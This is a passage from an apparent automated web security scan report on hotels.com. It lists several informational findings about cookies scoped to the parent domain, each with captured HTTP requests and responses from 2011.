Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=1; SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; user=QSplbl9VU3xIQ09NX1VT

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en_US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Location: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Content-Length: 0
Expect:
Content-Type: text/plain; charset=UTF-8
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:09:56 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:09:56 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:09:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMTo5Ny43My4xLmkzOjk4LjYuNDoxMzcuMC4wLmkyOjE0NS4wLjAuaTI6MTA4LjEuMC5pMjoxNTIuMC4wLmkyOjIuMi4xOjE5Ni4xLjA6OTIuMC4wLmkxOjEzMi4yLjAuaTI6MTIxLjUwMy4wLmk3OjEzOC4xLjA6MTk1LjAuMDoxMDQuMC4xfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:09:56 GMT; Path=/


13.160. http://www.hotels.com/compare/hotel_dockingbar.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /compare/hotel_dockingbar.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /compare/hotel_dockingbar.html?cd=10-04-11&dd=10-07-11&r=2&compare=false&saved=-691979445 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Last-Modified: Mon, 03 Oct 2011 00:00:00 GMT
Cache-Control: must-revalidate, proxy-revalidate, max-age=0
Expires: Mon, 03 Oct 2011 00:00:00 GMT
ntCoent-Length: 3650
Expect:
Content-Type: application/json;charset=UTF-8
Content-Length: 3650
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:09 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:09 GMT
Set-Cookie: mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:09 GMT; Path=/
Set-Cookie: user=RCoxMjQuMS4wLmkxOjk3LjczLjEuaTM6OTguNi40OjEzNy4wLjAuaTI6MTQ1LjAuMC5pMjoxMDguMS4wLmkyOjE1Mi4wLjAuaTI6Mi4yLjE6MTk2LjEuMDo5Mi4wLjAuaTE6MTMyLjIuMC5pMjoxMjEuNTAzLjAuaTc6MTM4LjEuMDoxOTUuMC4wOjEwNC4wLjF8SENPTV9VUyFBKmVuX1VTfEhDT01fVVM.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:10:09 GMT; Path=/

{
"dockingbarContent": "<div id=\"docking_bar\" class=\"docking_bar closed g rd_docking_bar\" unselectable=\"on\">\n <div class=\"wrapper\">\n <fieldset class=\"recent_hotels\">\n
...[SNIP]...

13.161. http://www.hotels.com/hotel/details.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/details.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
Expect:
Content-Type: text/html;charset=UTF-8
Pragma: no-cache
RTSS: 1
Vary: Accept-Encoding
Date: Mon, 03 Oct 2011 00:28:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.hotels.com
Set-Cookie: SSPV=H7gAAAAAAAIAAAAAAAAAAAAAAAYAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:28:19 GMT
Set-Cookie: homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; Version=1; Domain=.hotels.com; Max-Age=31536000; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:19 GMT; Path=/
Content-Length: 238921

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...

13.162. http://www.hotels.com/hotel/hoteldata.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hotel/hoteldata.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel/hoteldata.html?destinationId=1401516&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&validate=false&previousDateful=false&nightlyPrice=289%2CUSD&dateful=true HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: application/xml, text/xml, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Expect:
Content-Type: text/xml;charset=UTF-8
Pragma: no-cache
RTSS: 1
Content-Length: 12556
Date: Mon, 03 Oct 2011 00:28:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: mvthistory=103.4.1.i6%3A132.2.0.i2%7CHCOM_US; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:56 GMT; Path=/
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTAzLjQuMS5pNjoxMzIuMi4wLmkyfEhDT01fVVMhRSoxMDkzNjh8MDQvMTAvMjAxMXwwNy8xMC8yMDExfDI.; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:57 GMT; Path=/

<additional-hotel-data>
<trip-advisor>
<ta-reviews-trigger>
<![CDATA[
<h4 class="property_details_reviews_third_party_title">
TripAdvisor reviews for Omni Parker House</h
...[SNIP]...

13.163. http://www.hotels.com/hoteldetails/urgencypopup.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /hoteldetails/urgencypopup.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hoteldetails/urgencypopup.html?hotelId=109368 HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html, */*; q=0.01
Referer: http://www.hotels.com/hotel/details.html?pa=1&pn=1&ps=1&tab=description&destinationId=1643195&hotelId=109368&arrivalDate=10-04-11&departureDate=10-07-11&rooms[0].numberOfAdults=2&roomno=1&validate=false&previousDateful=false&reviewOrder=date_newest_first
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; s_cc=true; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf; s_sq=hotelsusprod%2Chotelsallprod%3D%2526pid%253Dsearch%252520result%252520with%252520dates%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.hotels.com%25252Fhotel%25252Fdetails.html%25253Fpa%25253D1%252526pn%25253D1%252526ps%25253D1%252526tab%25253Ddescription%252526destinationId%25253D1643195%252526hotelI%2526ot%253DA; SSRT=oQGJTgA; SSLB=1; homepage_search_data="Qm9zdG9uLCBNYXNzYWNodXNldHRzLCBVbml0ZWQgU3RhdGVz//10/04/11//10/07/11//2//MM/dd/yy//"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8MiFGKg..; SSPV=W_wAAAAAAAEAAAAAAAAAAAAAAAYAAAAAAAA

Response

HTTP/1.1 200 OK
Server: Apache
X-hcom-ctx: en_US|HCOM_US
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 26 Mar 2011 15:31:07 GMT
ntCoent-Length: 150
Expect:
Content-Type: text/html;charset=utf-8
Content-Length: 150
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:28:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: user=QSplbl9VU3xIQ09NX1VTIUQqMTg1LjAuMC5pMToxMTQuMS4wOjEyNC4xLjAuaTE6MTAzLjQuMS5pNjoxNzEuMS4wOjEzMC4xLjEuaTI6NDguMS4wOjk3LjczLjEuaTM6OTguNi40OjE0Mi4wLjAuaTQ6MTk4LjIuMDoxNDUuMC4wLmkyOjIwMC4wLjA6MTM3LjAuMC5pMjoxMDguMS4wLmkyOjE5MC4zLjA6MTUyLjAuMC5pMjoxMzQuMC4xOjE5Ni4xLjA6Mi4yLjE6MjA5LjAuMToxNDcuMC4xLmk2OjkyLjAuMC5pMToxMjEuNTAzLjAuaTc6MTMyLjIuMC5pMjoxMjIuMS4wLmkzOjEzOC4xLjA6MTQ5LjAuMC5pMToxMDQuMC4xOjE5NS4wLjB8SENPTV9VUyFFKjEwOTM2OHwwNC8xMC8yMDExfDA3LzEwLzIwMTF8Mg..; Domain=.hotels.com; Expires=Tue, 02-Oct-2012 00:28:41 GMT; Path=/

<span id="sense_of_urgency_close" class="blue" title="Close popup"></span>
<p>
This hotel has been booked 13 times in the last 24 hours</p>

13.164. http://www.hotels.com/html/blank.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /html/blank.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /html/blank.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; SSLB=1; SSPV=EMAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAA; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; user=RCoxMjQuMS4wLmkxJTNBOTcuNzMuMS5pMyUzQTk4LjYuNCUzQTEzNy4wLjAuaTIlM0ExNDUuMC4wLmkyJTNBMTA4LjEuMC5pMiUzQTE1Mi4wLjAuaTIlM0ExOTYuMS4wJTNBOTIuMC4wLmkxJTNBMTIxLjUwMy4wLmk3JTNBMTk1LjAuMCUzQTEwNC4wLjElN0NIQ09NX1VTIUEqZW5fVVN8SENPTV9VUw..

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:35:18 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:10:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSPV=usAAAAAAAAAAAAAAAAAAAAAAAAsAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:10:08 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>

13.165. http://www.hotels.com/html/tealeaf.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotels.com
Path:   /html/tealeaf.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /html/tealeaf.html HTTP/1.1
Host: www.hotels.com
Proxy-Connection: keep-alive
Content-Length: 1348
Origin: http://www.hotels.com
X-TeaLeaf-Page-Img-Fail: 36
X-TeaLeaf-Page-Render: 63175
X-TeaLeaf: ClientEvent
X-TeaLeaf-UIEventCapture-Version: 2011.07.22.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Content-Type: text/xml
X-TeaLeaf-Screen-Res: 4
X-TeaLeafType: PERFORMANCE
X-TeaLeafSubType: INIT
X-TeaLeaf-Page-Url: /search.do
Accept: */*
Referer: http://www.hotels.com/search.do?searchParams.arrivalDate=10-04-11&pointName&searchParams.departureDate=10-07-11&lon=0.0&queryFormState=CLOSED&monthCheckOut=10&fromHotelDetails=false&destination=Boston%2C&showSimilarDestinations=true&fromLandmark=false&searchParams.rooms[0].numberOfAdults=2&asaReport&dayInMonthCheckIn=4&fromDisambiguation=false&destinationForLandmark&monthCheckIn=10&activeTab=DESTINATION&dayInMonthCheckOut=7&lat=0.0&rooms=1&ppc=1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID=BQBsXxscAAAAAAAp_YhOsO4QAin9iE4BAAAAAAAAAAAAKf2ITgCCAAABgwQAACn9iE4BAIcAAAG0BAAAKf2ITgEA; SSSC=3.G5659051284361178800.1|130.1155:135.1204; SSRT=Kf2ITgA; SESSID=44777099D2E37148A35E76005853DABC.hm21tc04; guid=e206d102-4853-4dd2-9d9b-23d14562d0f1; channel=DC; homepage_search_data="Qm9zdG9uLA..//10/04/11//10/07/11//2//MM/dd/yy//1643195"; s_cc=true; s_sq=%5B%5BB%5D%5D; s_sv_sid=1011730152590; mvthistory=124.1.0.i1%3A97.73.1.i3%3A98.6.4%3A137.0.0.i2%3A145.0.0.i2%3A108.1.0.i2%3A152.0.0.i2%3A2.2.1%3A196.1.0%3A92.0.0.i1%3A132.2.0.i2%3A121.503.0.i7%3A138.1.0%3A195.0.0%3A104.0.1%7CHCOM_US; SSLB=1; user=QSplbl9VU3xIQ09NX1VTIUQqMTI0LjEuMC5pMSUzQTk3LjczLjEuaTMlM0E5OC42LjQlM0ExMzcuMC4wLmkyJTNBMTQ1LjAuMC5pMiUzQTEwOC4xLjAuaTIlM0ExNTIuMC4wLmkyJTNBMTk2LjEuMCUzQTkyLjAuMC5pMSUzQTEyMS41MDMuMC5pNyUzQTE5NS4wLjAlM0ExMDQuMC4xJTdDSENPTV9VUw..; SSPV=I8AAAAAAAAAAAAAAAAAAAAAAAAIAAAAAAAA; s_vi=[CS]v1|27447E9805012D59-4000010860553A8B[CE]; __utma=58230453.1140823611.1317600611.1317600611.1317600611.1; __utmb=58230453.1.10.1317600611; __utmc=58230453; __utmz=58230453.1317600611.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

<ClientEventSet PostTimeStamp="1317600763816" ><ClientEvent Count="1" Type="PERFORMANCE" SubType="INIT" TimeDuration="63175" DateSince1970="1317600617958" PageId="ID19H9M14S783R0.4504159395582974" >

...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Cteonnt-Length: 152
Expect:
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=0, proxy-revalidate
Content-Length: 152
Expires: Sat, 26 Mar 2011 15:33:11 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 03 Oct 2011 00:13:44 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSPV=RcAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAA; path=/; domain=.hotels.com; expires=Tue, 02-Oct-2012 00:13:44 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title></title></head><body><p></p></body></html>

13.166. http://www.hotels.com/search.do

Summary

Severity:   Information
